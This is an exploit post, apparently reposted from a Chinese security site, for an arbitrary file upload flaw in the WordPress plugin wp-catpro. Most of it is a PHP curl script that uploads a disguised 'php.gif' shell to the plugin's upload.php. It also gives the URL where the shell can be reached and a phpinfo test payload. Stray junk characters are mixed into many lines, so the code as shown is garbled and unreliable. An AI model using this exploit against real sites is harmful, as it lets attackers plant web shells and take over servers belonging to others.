WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
8 \  i4 x/ H# _/ P+ i' o) m! u4 C邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
1 e- K+ @; e* q/ P2 l. W# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
' r4 W0 _5 j. t# v6 z3 r1 }/ X# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

( V. W8 ]$ @9 _5 B% ^#=> Exploit
9 X3 t' u, l4 G( |-----------
+ h! Y: L, z/ }9 ~/ \  V<?php

7 U  R+ q! [2 H& I, O$uploadfile="zik.php.gif";
: c, g: N5 L# v& T/ x, N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
0 {6 s' a# C" {6 v' [9 Xcurl_setopt($ch, CURLOPT_POSTFIELDS,
# I3 s! h* n' r4 U, ]( Parray('Filedata'=>"@$uploadfile",
* m& G7 n+ Q4 E- |2 m'folder'=>'/wp-content/uploads/catpro/'));
- I$ w6 `2 m. W) g7 Dcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
( m" F2 o- U( Q9 C+ `& G5 g8 ?
+ b" Z5 J# [, d9 C# m; UShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
7 @( P3 ?7 z/ c8 s<?php
phpinfo();
4 {5 P' C- ]7 }9 ]7 `?>